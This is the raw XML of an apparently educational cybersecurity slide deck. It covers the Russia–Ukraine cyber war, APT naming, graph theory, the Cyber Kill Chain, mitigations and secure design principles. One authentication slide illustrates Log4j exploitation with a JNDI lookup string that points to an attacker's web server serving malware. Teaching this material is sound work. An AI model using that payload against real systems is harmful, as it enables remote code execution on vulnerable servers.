            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network segmentation based on roles and functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create, maintain, and exercise a cyber incident response plan </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[train as you fight, fight as you train]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintain offline backups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify attack surfaces by mapping external facing assets [Shodan]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other activities as well [AA-22-110a]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184037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8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1DD5-5FF7-5E4A-96A3-B12D5312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6229-93F2-C947-9538-C9E17506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 war (Russia v. Ukraine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acronyms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat Agent Library </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Graph Theory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cyber Kill Chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CNA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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46760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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Economy of Mechanism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7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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Economy of Mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete Mediation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8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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Economy of Mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete Mediation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Design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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Economy of Mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete Mediation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separation of Privilege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8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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Economy of Mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete Mediation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separation of Privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Least Common Mechanism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9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3A7B-68D4-AA4B-B74E-39B88C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42D2-EC99-D749-8178-A8A57A33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Privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fail-Safe Defaults</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Economy of Mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete Mediation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separation of Privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Least Common Mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Psychological Acceptability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6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AD969-59F8-4844-B31E-48626077AE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April 26, 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85322-FC15-445A-9972-7AA7E1C3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Pg. </a:t>
            </a:r>
            <a:fld id="{818D94B4-8502-5D40-8A2F-77E12E79206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69C333A5-75A9-40F2-A0D3-8FEB48300FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080885" y="1224118"/>
            <a:ext cx="4091189" cy="4409764"/>
          </a:xfrm>
          <a:prstGeom prst="diamon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Authentication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(log4j)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907304-6F54-4AAD-8259-C6EDECB97B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318108" y="1577662"/>
            <a:ext cx="1987210" cy="14037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charlieb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(R3dhairedGirl!)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9BCD8-4745-4F4D-A5E6-0072A822DDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="1281959"/>
            <a:ext cx="2992921" cy="23439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B8DADF-A35B-4C65-A2C5-7753D6024870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="3740795"/>
            <a:ext cx="2992921" cy="23439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9172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206 L 0.3931 0.17453 L 0.75495 0.027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AD969-59F8-4844-B31E-48626077AE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April 26, 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85322-FC15-445A-9972-7AA7E1C3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Pg. </a:t>
            </a:r>
            <a:fld id="{818D94B4-8502-5D40-8A2F-77E12E79206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69C333A5-75A9-40F2-A0D3-8FEB48300FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080885" y="1224118"/>
            <a:ext cx="4091189" cy="4409764"/>
          </a:xfrm>
          <a:prstGeom prst="diamon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Authentication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(log4j)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907304-6F54-4AAD-8259-C6EDECB97B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318108" y="1577662"/>
            <a:ext cx="1987210" cy="14037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linusvp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Love.my.blanket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9BCD8-4745-4F4D-A5E6-0072A822DDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="1281959"/>
            <a:ext cx="2992921" cy="23439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B8DADF-A35B-4C65-A2C5-7753D6024870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="3740795"/>
            <a:ext cx="2992921" cy="23439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7565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206 L 0.3931 0.17453 L 0.75495 0.027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AD969-59F8-4844-B31E-48626077AE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April 26, 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85322-FC15-445A-9972-7AA7E1C3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Pg. </a:t>
            </a:r>
            <a:fld id="{818D94B4-8502-5D40-8A2F-77E12E79206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69C333A5-75A9-40F2-A0D3-8FEB48300FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080885" y="1224118"/>
            <a:ext cx="4091189" cy="4409764"/>
          </a:xfrm>
          <a:prstGeom prst="diamon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Authentication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(log4j)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907304-6F54-4AAD-8259-C6EDECB97B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318108" y="1577662"/>
            <a:ext cx="1987210" cy="14037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hacker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(P@ssw0rd)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9BCD8-4745-4F4D-A5E6-0072A822DDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="1281959"/>
            <a:ext cx="2992921" cy="23439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B8DADF-A35B-4C65-A2C5-7753D6024870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="3740795"/>
            <a:ext cx="2992921" cy="23439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18413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185 L 0.39258 0.17176 L 0.76602 0.39143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AD969-59F8-4844-B31E-48626077AE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April 26, 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85322-FC15-445A-9972-7AA7E1C3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Pg. </a:t>
            </a:r>
            <a:fld id="{818D94B4-8502-5D40-8A2F-77E12E79206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69C333A5-75A9-40F2-A0D3-8FEB48300FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080885" y="1224118"/>
            <a:ext cx="4091189" cy="4409764"/>
          </a:xfrm>
          <a:prstGeom prst="diamon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Authentication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(log4j)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907304-6F54-4AAD-8259-C6EDECB97B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318108" y="1577662"/>
            <a:ext cx="3114112" cy="14037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${jndi://http://192.168.1.200/malware}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(P@ssw0rd)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9BCD8-4745-4F4D-A5E6-0072A822DDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="1281959"/>
            <a:ext cx="2992921" cy="23439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B8DADF-A35B-4C65-A2C5-7753D6024870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="3740795"/>
            <a:ext cx="2992921" cy="23439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1C3DC7F-86E0-4146-9D31-BCEC17743E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318109" y="4108361"/>
            <a:ext cx="3114112" cy="1783724"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDis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Attacker’s Web Server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(192.168.1.200)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6F0A7B6-580D-4F00-A56C-433D71484185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435993" y="3245475"/>
            <a:ext cx="1107584" cy="1403797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Malware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0348ABE-0E9D-473A-9A6A-80DEFF6634ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20017109">
            <a:off x="3509003" y="4596691"/>
            <a:ext cx="2050556" cy="484632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Log4j</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30880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185 L 0.39257 0.17176 L 0.76601 0.3914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4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463 L 0.34076 -0.00555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79CB-7B97-D241-8C93-02AFD85A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4FC70-3900-8841-8E6B-2EB88D79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" y="1907534"/>
            <a:ext cx="4740965" cy="3160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A095D-7E71-0C47-9341-33C27B6AF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791" y="1898373"/>
            <a:ext cx="4735139" cy="31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3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AD969-59F8-4844-B31E-48626077AE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A3749F-FA74-264E-A1D6-65E17B3CB8B6}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>April 26, 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85322-FC15-445A-9972-7AA7E1C3E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| Pg. </a:t>
            </a:r>
            <a:fld id="{818D94B4-8502-5D40-8A2F-77E12E79206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69C333A5-75A9-40F2-A0D3-8FEB48300FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080885" y="1224118"/>
            <a:ext cx="4091189" cy="4409764"/>
          </a:xfrm>
          <a:prstGeom prst="diamon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Authentication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(log4j)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907304-6F54-4AAD-8259-C6EDECB97B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318108" y="1577662"/>
            <a:ext cx="1987210" cy="14037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hacker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(P@ssw0rd)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9BCD8-4745-4F4D-A5E6-0072A822DDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="1281959"/>
            <a:ext cx="2992921" cy="23439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B8DADF-A35B-4C65-A2C5-7753D6024870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8984431" y="3740795"/>
            <a:ext cx="2992921" cy="234395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42623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2.59259E-6 L 0.39675 0.17268 L 0.75651 0.02338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F87E-A69A-B244-8DE0-38ED0BC6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have so many weird names for hackers?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2068C-2F02-5543-AEAE-C77E46F3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06" y="3675076"/>
            <a:ext cx="5019326" cy="2810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94FAC-43A7-1D49-99E0-41F77525A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4" y="1953993"/>
            <a:ext cx="4594785" cy="301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C1DA5-BD25-7544-BA0B-5943D1847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038" y="2300508"/>
            <a:ext cx="4637616" cy="25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0600-985D-824D-9157-F79738C6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APT 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51A67-009C-0846-9B2B-AC262C5D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74" y="1712985"/>
            <a:ext cx="7294508" cy="4863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9A775-0F39-CE42-AD1B-8BF47CC6C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80" y="2449172"/>
            <a:ext cx="4539674" cy="2269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D0265-728B-A84C-B9FC-43ED546C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766" y="3937380"/>
            <a:ext cx="4551968" cy="2836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3CDA1B-90D1-B34F-B694-8739731E7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515" y="2449172"/>
            <a:ext cx="4320186" cy="26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EDF7-72EA-3D40-A101-DB2706C6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Threats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4B5A91-ACF5-DA45-9F0B-9487AE0A3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785" y="482007"/>
            <a:ext cx="9316941" cy="6185197"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10770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6C14-CC6E-864F-B536-7872F6A8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Graph Theory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62AED6-6916-8243-9802-A1D0C59AAA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330232" y="2690948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A7CE85-5419-A14B-8EB4-D44CBAF53264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775164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0042FE-00CB-4B45-AF37-072EE1448B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364671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1B5D-AA5B-6A49-B39F-BC8E6482BBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470263" y="5303516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115EC9-095B-A24F-9CEE-76646995C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6220096" y="3344090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2C73-8A20-914E-915C-CA525C74C669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860842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329B9-83EA-C147-B035-408289FA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9261566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297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6C14-CC6E-864F-B536-7872F6A8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Graph Theory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62AED6-6916-8243-9802-A1D0C59AAA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330232" y="2690948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A7CE85-5419-A14B-8EB4-D44CBAF53264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775164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0042FE-00CB-4B45-AF37-072EE1448B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364671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1B5D-AA5B-6A49-B39F-BC8E6482BBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470263" y="5303516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115EC9-095B-A24F-9CEE-76646995C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6220096" y="3344090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2C73-8A20-914E-915C-CA525C74C669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860842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329B9-83EA-C147-B035-408289FA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9261566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  <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0"/>
              <a:t>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523C8-C12B-504F-B747-5895EB7F097B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2636517" y="2943497"/>
            <a:ext cx="1138647" cy="400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B0672-5015-0D4A-9F22-E8F6631E6154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123406" y="3805932"/>
            <a:ext cx="398127" cy="1497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CDAE42-E95B-5445-AE31-5F0E8046A5E8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2445216" y="3805932"/>
            <a:ext cx="1392798" cy="103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81E728-098D-D447-8DAE-2F8AB0D778A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4299856" y="3596639"/>
            <a:ext cx="128451" cy="105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8A5DAD-08CA-7046-87C9-D430D1F35D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="6" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4952998" y="5303516"/>
            <a:ext cx="3655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5C5AFC-3527-1143-BB58-19EDA6B1EE2E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7526381" y="2943497"/>
            <a:ext cx="1735185" cy="1053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1B42C3-51AC-7E41-8D7C-4A340174C7E9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9261566" y="3596639"/>
            <a:ext cx="653143" cy="105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6C14-CC6E-864F-B536-7872F6A8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Graph Theory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62AED6-6916-8243-9802-A1D0C59AAA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330232" y="2690948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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25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A7CE85-5419-A14B-8EB4-D44CBAF53264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775164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  <a:endParaRPr lang="en-US" baseline="-25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0042FE-00CB-4B45-AF37-072EE1448B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364671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Avery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1B5D-AA5B-6A49-B39F-BC8E6482BBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470263" y="5303516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Ewan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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115EC9-095B-A24F-9CEE-76646995C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6220096" y="3344090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Henry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2C73-8A20-914E-915C-CA525C74C669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8608423" y="4650373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Emma</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25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329B9-83EA-C147-B035-408289FA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9261566" y="2290354"/>
            <a:ext cx="1306285" cy="1306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Corby</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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523C8-C12B-504F-B747-5895EB7F097B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2636517" y="2943497"/>
            <a:ext cx="1138647" cy="400594"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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B0672-5015-0D4A-9F22-E8F6631E6154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123406" y="3805932"/>
            <a:ext cx="398127" cy="1497584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CDAE42-E95B-5445-AE31-5F0E8046A5E8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2445216" y="3805932"/>
            <a:ext cx="1392798" cy="1035742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81E728-098D-D447-8DAE-2F8AB0D778A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4299856" y="3596639"/>
            <a:ext cx="128451" cy="1053734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8A5DAD-08CA-7046-87C9-D430D1F35D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="6" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4952998" y="5303516"/>
            <a:ext cx="3655425" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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5C5AFC-3527-1143-BB58-19EDA6B1EE2E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7526381" y="2943497"/>
            <a:ext cx="1735185" cy="1053736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1B42C3-51AC-7E41-8D7C-4A340174C7E9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9261566" y="3596639"/>
            <a:ext cx="653143" cy="1053734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376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279</TotalTime>
  <Words>1636</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>304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Vapor Trail</vt:lpstr>
      <vt:lpstr>Down the rabbit hole</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Cyber War</vt:lpstr>
      <vt:lpstr>Why do we have so many weird names for hackers?</vt:lpstr>
      <vt:lpstr>Other APT Actors</vt:lpstr>
      <vt:lpstr>Other Types of Threats</vt:lpstr>
      <vt:lpstr>A little Graph Theory</vt:lpstr>
      <vt:lpstr>A little Graph Theory</vt:lpstr>
      <vt:lpstr>A little Graph Theory</vt:lpstr>
      <vt:lpstr>A little Graph Theory</vt:lpstr>
      <vt:lpstr>A little Graph Theory</vt:lpstr>
      <vt:lpstr>The Cyber Kill Chain</vt:lpstr>
      <vt:lpstr>Back to Ukraine (2015)</vt:lpstr>
      <vt:lpstr>Ukraine (2017)</vt:lpstr>
      <vt:lpstr>Ukraine (2022)</vt:lpstr>
      <vt:lpstr>Common Vulnerabilities and Exposures</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr> Design Principles</vt:lpstr>
      <vt:lpstr> Design Principles</vt:lpstr>
      <vt:lpstr> Design Principles</vt:lpstr>
      <vt:lpstr> Design Principles</vt:lpstr>
      <vt:lpstr> Design Principles</vt:lpstr>
      <vt:lpstr> Design Principles</vt:lpstr>
      <vt:lpstr> Design Principles</vt:lpstr>
      <vt:lpstr> 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the rabbit hole</dc:title>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-26T16:19:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-26T20:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>